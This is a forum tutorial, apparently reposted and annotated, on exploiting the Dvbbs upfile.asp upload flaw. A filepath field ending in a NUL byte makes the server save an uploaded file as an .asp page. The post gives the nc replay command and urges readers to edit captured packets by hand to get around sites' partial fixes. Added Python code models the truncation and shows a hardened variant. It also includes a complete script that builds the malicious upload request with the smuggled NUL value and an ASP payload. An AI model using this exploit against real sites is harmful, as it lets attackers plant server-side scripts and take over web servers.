Bookmarking this article about upload vulnerabilities; I have been running into this problem recently.
Author: szjwwwwww
From: Black Hawk Base Forum
http://www.3800cc.com
1. A few words up front
***The principle behind this upload vulnerability applies only to ASP and PHP scripts that accept uploads through a form***
NC (Netcat)
Used to submit raw data packets (HTTP requests).
Run from the DOS prompt:
nc -vv www.***.com 80 < 1.txt
-vv: verbose output (echoes the connection and the server's reply)
80: the web server port
1.txt: the data packet (the raw HTTP request) you want to send
(For more usage, see the other posts in this board)
WSE (WSockExpert)
Monitors a local port and captures the data packets that IE submits.
(If you don't know how to use it, look it up online.)
2. The principle of the vulnerability
Assumptions for the example below:
web host: www.***.com;
bbs path: /bbs/
The vulnerability came out of studying how file uploads are handled on the web; some programming experience is recommended.
Look at the upfile.asp file of Dvbbs; there is no need to understand all of it.
upfile.asp receives the upload from a form. The variables it uses:
filepath, default value uploadface, attribute hidden
act, default value upload, attribute hidden
file1, the file you want to upload
The key is the filepath variable!
By default our files are uploaded to www.***.com/bbs/uploadface/
The file is named after the upload time, which is this line in upfile.asp (FormPath is the value taken from the filepath form field):
FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt
-------------------------------------------------------------------------
We know that a string in memory is terminated by a "\0" (null byte). Anyone who has used C knows that
char data[]="bbs"
has length 4: bbs\0
What happens if we construct filepath as follows?
filepath="/newmm.asp\0"
(that is, a literal 0x00 byte right after newmm.asp)
Suppose we upload a file at 2004-09-24 08:24. Without the change it is saved as:
http://www.***.com/bbs/uploadface/200409240824.jpg
With the filepath we constructed, the script builds the name (upfile.asp appends a "/" to the directory when it does not already end in one):
http://www.***.com/newmm.asp\0/200409240824.jpg
When the server hands this filepath to the file-system API, the \0 after newmm.asp is treated as the end of the string, so everything after it is dropped.
In this way the file we upload, for example c:\1.asp,
is saved as: http://www.***.com/newmm.asp
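The truncation described above, as an added example that is not code from the original post or from Dvbbs: a Python model of the upfile.asp filename line, of what a NUL-terminated file API actually sees, and of a hardened variant next to it. The helper names, the upload directory constant, the extension whitelist and the timestamp/random values are assumptions constructed for the example.

```python
# Added example (not part of the original post or of Dvbbs).
# Models FileName=FormPath&year(now)&...&ranNum&"."&FileExt and the NUL truncation.

def dvbbs_filename(form_path: str, file_ext: str,
                   when: str = "200409240824", ran_num: str = "99") -> str:
    """Vulnerable construction: the client-controlled directory is concatenated as-is.
    `when`/`ran_num` stand in for the time and random parts (constructed sample values)."""
    return form_path + when + ran_num + "." + file_ext


def as_seen_by_c_string_api(name: str) -> str:
    """What a NUL-terminated (C-string) file API actually uses: everything up to the first \\0."""
    nul = name.find("\x00")
    return name if nul < 0 else name[:nul]


# Hardened side (assumptions for the example): the directory is a server constant,
# nothing from the client is allowed to contain a NUL byte, and the extension is whitelisted.
UPLOAD_DIR = "/bbs/uploadface/"
ALLOWED_EXT = {"jpg", "jpeg", "gif", "png"}


def hardened_filename(client_path: str, client_ext: str,
                      when: str = "200409240824", ran_num: str = "99") -> str:
    """Hardened construction: client_path is checked but never used as the directory."""
    for field in (client_path, client_ext):
        if "\x00" in field:
            raise ValueError("NUL byte in client-supplied field")
    ext = client_ext.lower()
    if not ext.isalnum() or ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % client_ext)
    return UPLOAD_DIR + when + ran_num + "." + ext


if __name__ == "__main__":
    normal = dvbbs_filename("/bbs/uploadface/", "jpg")
    evil = dvbbs_filename("/newmm.asp\x00", "jpg")
    print(repr(normal), "->", as_seen_by_c_string_api(normal))
    print(repr(evil), "->", as_seen_by_c_string_api(evil))   # -> '/newmm.asp'
```

Note that the extension check alone does not help the vulnerable version: FileExt is still "jpg", but the saved name is whatever precedes the \0 in filepath.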
3. Follow-up notes
After the vulnerability was announced, many websites applied some sort of fix, but most never actually filtered or sanitized filepath.
Many sites just added N extra hidden variables to defeat the upfile.exe published online (the upload exploit tool, or the filepath exploit tool by "veteran")... but the root cause was never changed.
Similar vulnerabilities exist in website plug-ins as well. My point is: do not rely on special tools.
Change the filepath variable yourself in the packet captured by WSE, then submit it with NC...
Even if the site adds N hidden variables, it will make no difference.
Of course, if filepath is strictly filtered, our theory ends there.
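The manual procedure above (capture the form submission, change filepath, replay it with NC), as an added example that is not code from the original post: a Python script that writes the raw multipart POST to 1.txt so that nc -vv host 80 < 1.txt can send it. The field names filepath, act and file1 and the path /bbs/upfile.asp come from the post; the host name, the boundary string and the file contents are constructed placeholders. Two practical points it makes explicit: a multipart body is not percent-decoded, so the NUL has to be a literal 0x00 byte in the body (%00 does nothing here), and after hand-editing a captured packet the Content-Length header must still match the body length, otherwise the server reads a truncated or overlong request.

```python
# Added example (not part of the original post). Builds the raw upload request
# that the post describes capturing with WSE, editing, and replaying with nc.
from typing import Optional

HOST = "www.example.com"            # placeholder host (assumption)
UPLOAD_URL = "/bbs/upfile.asp"      # from the post
BOUNDARY = "---------------------------7d4a6d158c9"   # constructed; any unique token works


def multipart_part(name: str, value: bytes, filename: Optional[str] = None,
                   ctype: Optional[str] = None) -> bytes:
    """One multipart/form-data part. `value` is bytes so a 0x00 can be embedded verbatim."""
    disp = 'form-data; name="%s"' % name
    if filename is not None:
        disp += '; filename="%s"' % filename
    head = ("--%s\r\nContent-Disposition: %s\r\n" % (BOUNDARY, disp)).encode()
    if ctype:
        head += ("Content-Type: %s\r\n" % ctype).encode()
    return head + b"\r\n" + value + b"\r\n"


def build_upload_request(filepath: bytes, file_name: str, file_data: bytes) -> bytes:
    """Raw HTTP/1.0 request bytes; Content-Length is computed from the final body."""
    body = (multipart_part("filepath", filepath)
            + multipart_part("act", b"upload")
            + multipart_part("file1", file_data, filename=file_name, ctype="image/pjpeg")
            + ("--%s--\r\n" % BOUNDARY).encode())
    headers = ("POST %s HTTP/1.0\r\n"
               "Host: %s\r\n"
               "Content-Type: multipart/form-data; boundary=%s\r\n"
               "Content-Length: %d\r\n\r\n" % (UPLOAD_URL, HOST, BOUNDARY, len(body))).encode()
    return headers + body


def content_length_matches(request: bytes) -> bool:
    """Sanity check for a hand-edited packet: declared Content-Length == actual body length."""
    head, _, body = request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1].strip().decode()) == len(body)
    return False


if __name__ == "__main__":
    # Constructed sample: filepath "/newmm.asp" followed by a literal NUL byte.
    req = build_upload_request(b"/newmm.asp\x00", "1.jpg", b"<% Response.Write(\"test\") %>\r\n")
    assert content_length_matches(req)
    with open("1.txt", "wb") as f:      # then: nc -vv www.example.com 80 < 1.txt
        f.write(req)
```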